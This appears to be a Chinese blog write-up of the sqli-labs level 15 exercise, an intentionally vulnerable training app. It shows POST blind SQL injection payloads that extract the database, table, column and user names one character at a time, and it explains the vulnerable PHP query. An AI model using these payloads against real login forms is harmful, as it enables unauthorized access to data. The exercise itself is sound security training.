<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>sqli-labs关卡/sqli-labs第十五关POST盲注 | 栈桥仔</title>

  <!-- keywords -->
  

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="1在这里我们输入任何东西不返回错误，可以判断使用盲注   123使用盲注查看当前数据库的第一个字母uname&#x3D;&#39; or (select ascii(substr(database(),1,1)) &#x3D; 115)#&amp;passwd&#x3D;&amp;submit&#x3D;Submit之前错误字体都返回红色，这里返回蓝色说明正确   123456看一下源码，这一句是">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli-labs关卡&#x2F;sqli-labs第十五关POST盲注">
<meta property="og:url" content="https://zhanqiaozai.github.io/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/index.html">
<meta property="og:site_name" content="栈桥仔">
<meta property="og:description" content="1在这里我们输入任何东西不返回错误，可以判断使用盲注   123使用盲注查看当前数据库的第一个字母uname&#x3D;&#39; or (select ascii(substr(database(),1,1)) &#x3D; 115)#&amp;passwd&#x3D;&amp;submit&#x3D;Submit之前错误字体都返回红色，这里返回蓝色说明正确   123456看一下源码，这一句是">
<meta property="og:image" content="https://zhanqiaozai.github.io/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/C:%5CUsers%5C%E7%8A%B6%E5%85%83%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1584496565639.png">
<meta property="og:image" content="https://zhanqiaozai.github.io/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/C:%5CUsers%5C%E7%8A%B6%E5%85%83%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1584496665304.png">
<meta property="og:image" content="https://zhanqiaozai.github.io/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/C:%5CUsers%5C%E7%8A%B6%E5%85%83%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1584497039432.png">
<meta property="og:image" content="https://zhanqiaozai.github.io/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/C:%5CUsers%5C%E7%8A%B6%E5%85%83%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1584497624408.png">
<meta property="og:image" content="https://zhanqiaozai.github.io/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/C:%5CUsers%5C%E7%8A%B6%E5%85%83%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1584497680186.png">
<meta property="og:image" content="https://zhanqiaozai.github.io/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/C:%5CUsers%5C%E7%8A%B6%E5%85%83%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1584497882191.png">
<meta property="og:image" content="https://zhanqiaozai.github.io/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/C:%5CUsers%5C%E7%8A%B6%E5%85%83%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1584498278910.png">
<meta property="og:image" content="https://zhanqiaozai.github.io/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/C:%5CUsers%5C%E7%8A%B6%E5%85%83%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1584499384077.png">
<meta property="og:image" content="https://zhanqiaozai.github.io/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/C:%5CUsers%5C%E7%8A%B6%E5%85%83%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1584499466457.png">
<meta property="article:published_time" content="2020-07-25T01:18:02.618Z">
<meta property="article:modified_time" content="2020-03-18T02:44:36.028Z">
<meta property="article:author" content="zhanqiaozai">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://zhanqiaozai.github.io/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/C:%5CUsers%5C%E7%8A%B6%E5%85%83%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1584496565639.png">
  
    <link rel="alternative" href="/atom.xml" title="栈桥仔" type="application/atom+xml">
  
  
    <link rel="icon" href="http://7xkj1z.com1.z0.glb.clouddn.com/head.jpg">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  

  
<script src="//cdn.bootcss.com/require.js/2.3.2/require.min.js"></script>

  
<script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script>


  
<meta name="generator" content="Hexo 4.2.0"></head>
<body>
  <div id="container">
    <div id="particles-js"></div>
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
	<header id="header" class="inner">
		<a href="/" class="profilepic">
			
			<img lazy-src="http://7xkj1z.com1.z0.glb.clouddn.com/head.jpg" class="js-avatar">
			
		</a>

		<hgroup>
		  <h1 class="header-author"><a href="/">zhanqiaozai</a></h1>
		</hgroup>

		

		
			<div class="switch-btn">
				<div class="icon">
					<div class="icon-ctn">
						<div class="icon-wrap icon-house" data-idx="0">
							<div class="birdhouse"></div>
							<div class="birdhouse_holes"></div>
						</div>
						<div class="icon-wrap icon-ribbon hide" data-idx="1">
							<div class="ribbon"></div>
						</div>
						
						<div class="icon-wrap icon-link hide" data-idx="2">
							<div class="loopback_l"></div>
							<div class="loopback_r"></div>
						</div>
						
						
					</div>
					
				</div>
				<div class="tips-box hide">
					<div class="tips-arrow"></div>
					<ul class="tips-inner">
						<li>菜单</li>
						<li>标签</li>
						
						<li>友情链接</li>
						
						
					</ul>
				</div>
			</div>
		

		<div class="switch-area">
			<div class="switch-wrap">
				<section class="switch-part switch-part1">
					<nav class="header-menu">
						<ul>
						
							<li><a href="/">主页</a></li>
				        
							<li><a href="/archives">所有文章</a></li>
				        
						</ul>
					</nav>
					<nav class="header-nav">
						<div class="social">
							
						</div>
					</nav>
				</section>
				
				
				<section class="switch-part switch-part2">
					<div class="widget tagcloud" id="js-tagcloud">
						
					</div>
				</section>
				
				
				
				<section class="switch-part switch-part3">
					<div id="js-friends">
					
			          <a target="_blank" class="main-nav-link switch-friends-link" href="https://github.com/smackgg/hexo-theme-smackdown">smackdown</a>
			        
			        </div>
				</section>
				

				
			</div>
		</div>
	</header>				
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
  	<div class="overlay">
  		<div class="slider-trigger"></div>
  		<h1 class="header-author js-mobile-header hide">zhanqiaozai</h1>
  	</div>
	<div class="intrude-less">
		<header id="header" class="inner">
			<div class="profilepic">
				<img lazy-src="http://7xkj1z.com1.z0.glb.clouddn.com/head.jpg" class="js-avatar">
			</div>
			<hgroup>
			  <h1 class="header-author">zhanqiaozai</h1>
			</hgroup>
			
			<nav class="header-menu">
				<ul>
				
					<li><a href="/">主页</a></li>
		        
					<li><a href="/archives">所有文章</a></li>
		        
		        <div class="clearfix"></div>
				</ul>
			</nav>
			<nav class="header-nav">
				<div class="social">
					
				</div>
			</nav>
		</header>				
	</div>
</nav>
      <div class="body-wrap"><article id="post-sqli-labs关卡/sqli-labs第十五关POST盲注" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/" class="article-date">
  	<time datetime="2020-07-25T01:18:02.618Z" itemprop="datePublished">2020-07-25</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      sqli-labs关卡/sqli-labs第十五关POST盲注
      
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
        

        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
        <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">在这里我们输入任何东西不返回错误，可以判断使用盲注</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/C:%5CUsers%5C%E7%8A%B6%E5%85%83%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1584496565639.png" alt="1584496565639"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">使用盲注查看当前数据库的第一个字母</span><br><span class="line">uname&#x3D;&#39; or (select ascii(substr(database(),1,1)) &#x3D; 115)#&amp;passwd&#x3D;&amp;submit&#x3D;Submit</span><br><span class="line">之前错误字体都返回红色，这里返回蓝色说明正确</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/C:%5CUsers%5C%E7%8A%B6%E5%85%83%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1584496665304.png" alt="1584496665304"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">看一下源码，这一句是非常重要的，也是最有用的</span><br><span class="line">@$sql&#x3D;&quot;SELECT username, password FROM users WHERE username&#x3D;&#39;$uname&#39; and password&#x3D;&#39;$passwd&#39;</span><br><span class="line"></span><br><span class="line">我们将我们的公式带进去</span><br><span class="line">这里用直接使用单引号和用or的原因是，or只需要一边成立就执行，这里双引号闭合，里面没有内容，所以不成立，因为or的特性是只要你有一个不成立，第二个不管你成不成立直接执行，所以执行了我们后面的sql语句</span><br><span class="line">@$sql&#x3D;&quot;SELECT username, password FROM users WHERE username&#x3D;&#39;&#39; or (select ascii(substr(database(),1,1)) &#x3D; 115)#&#39; and password&#x3D;&#39;$passwd&#39;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">这里测试其他字母</span><br><span class="line">uname&#x3D;&#39; or (select ascii(substr(database(),2,1)) &#x3D; 101)#&amp;passwd&#x3D;&amp;submit&#x3D;Submit</span><br><span class="line">输入101返回正确，ascii对应的是e，以此类推，得出当前数据库是 security</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/C:%5CUsers%5C%E7%8A%B6%E5%85%83%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1584497039432.png" alt="1584497039432"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">知道当前数据库是security之后查看数据库下的表</span><br><span class="line">uname&#x3D;&#39; or (select ascii(substr((select table_name from information_schema.tables where table_schema&#x3D;&#39;security&#39; limit 0,1),1,1)) &#x3D; 101)#&amp;passwd&#x3D;&amp;submit&#x3D;Submit</span><br><span class="line">当输入&#x3D;101时返回蓝色，说明正确</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/C:%5CUsers%5C%E7%8A%B6%E5%85%83%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1584497624408.png" alt="1584497624408"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">我们尝试一下输入其他的ascii码看一下是否能返回红色</span><br><span class="line">这里我们将ascii码改为了100，页面返回红色，说明错误，证明sql语句无误</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/C:%5CUsers%5C%E7%8A%B6%E5%85%83%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1584497680186.png" alt="1584497680186"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">按照之前列举库名一样，我们得出第一个表名为emails</span><br><span class="line">测试第四个表名看一下</span><br><span class="line">uname&#x3D;&#39; or (select ascii(substr((select table_name from information_schema.tables where table_schema&#x3D;&#39;security&#39; limit 3,1),1,1)) &#x3D; 117)#&amp;passwd&#x3D;&amp;submit&#x3D;Submit</span><br><span class="line">这里将limit改为3，因为limit是从0开始如果查看第四个改成3</span><br><span class="line">页面返回正确，117对应的是u，以此类推，返回结果是users表</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/C:%5CUsers%5C%E7%8A%B6%E5%85%83%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1584497882191.png" alt="1584497882191"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">查看usres表下的字段</span><br><span class="line">uname&#x3D;&#39; or (select ascii(substr((select column_name from information_schema.columns where table_schema&#x3D;&#39;security&#39; and table_name&#x3D;&#39;users&#39; limit 1,1),1,1)) &#x3D; 117)#&amp;passwd&#x3D;&amp;submit&#x3D;Submit</span><br><span class="line">我们查询了第二个字段ascii是117对应的u，类推之后返回 username</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/C:%5CUsers%5C%E7%8A%B6%E5%85%83%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1584498278910.png" alt="1584498278910"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">查看username字段下的数据</span><br><span class="line">uname&#x3D;&#39; or (select ascii(substr((select username from users limit 1,1),1,1)) &#x3D; </span><br><span class="line">65)#&amp;passwd&#x3D;&amp;submit&#x3D;Submit</span><br><span class="line">使用burp抓包自动筛选，65对应的是A，因为limit是1所以查看的是第二个数据</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/C:%5CUsers%5C%E7%8A%B6%E5%85%83%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1584499384077.png" alt="1584499384077"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">登录数据库查看第二个数据是否为A，第二个数据开头为A说明正确</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/C:%5CUsers%5C%E7%8A%B6%E5%85%83%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1584499466457.png" alt="1584499466457"></p>

      
    </div>
    
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E5%85%AB%E5%85%B3POST%E6%8A%A5%E9%94%99User-Agent%E4%BD%8D%E7%BD%AE/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">&lt;</strong>
      <div class="article-nav-title">
        
          sqli-labs关卡/sqli-labs第十八关POST报错User-Agent位置
        
      </div>
    </a>
  
  
    <a href="/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%8C%E5%85%B3POST%E8%81%94%E5%90%88/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">sqli-labs关卡/sqli-labs第十二关POST联合</div>
      <strong class="article-nav-caption">&gt;</strong>
    </a>
  
</nav>

  
</article>


<div class="ds-share share" data-thread-key="sqli-labs关卡/sqli-labs第十五关POST盲注" data-title="sqli-labs关卡/sqli-labs第十五关POST盲注" data-url="https://zhanqiaozai.github.io/2020/07/25/sqli-labs%E5%85%B3%E5%8D%A1/sqli-labs%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3POST%E7%9B%B2%E6%B3%A8/"  data-images="http://7xkj1z.com1.z0.glb.clouddn.com/head.jpg" data-content="sqli-labs关卡/sqli-labs第十五关POST盲注">
    <div class="ds-share-inline">
      <ul  class="ds-share-icons-16">
      	<li data-toggle="ds-share-icons-more"><a class="ds-more" href="javascript:void(0);">分享到：</a></li>
        <li><a class="ds-weibo" href="javascript:void(0);" data-service="weibo">微博</a></li>
        <li><a class="ds-qzone" href="javascript:void(0);" data-service="qzone">QQ空间</a></li>
        <li><a class="ds-qqt" href="javascript:void(0);" data-service="qqt">腾讯微博</a></li>
        <li><a class="ds-wechat" href="javascript:void(0);" data-service="wechat">微信</a></li>
      </ul>
      <div class="ds-share-icons-more">
      </div>
    </div>
 </div>
 





</div>
      <footer id="footer">
  <div class="outer">
    <div id="footer-info">
      <div class="footer-left">
        &copy; 2020 zhanqiaozai
      </div>
        <div class="footer-right">
          <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/smackgg/hexo-theme-smackdown" target="_blank">Smackdown</a>
        </div>
    </div>
  </div>
</footer>
    </div>
    
  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">



<script>
	var yiliaConfig = {
		fancybox: true,
		mathjax: true,
		animate: true,
		isHome: false,
		isPost: true,
		isArchive: false,
		isTag: false,
		isCategory: false,
		open_in_new: false
	}
</script>

<script src="/js/main.js"></script>




<script type="text/x-mathjax-config">
MathJax.Hub.Config({
    tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
        processEscapes: true,
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    }
});

MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';                 
    }       
});
</script>

<script src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js"></script>


  </div>
</body>
</html>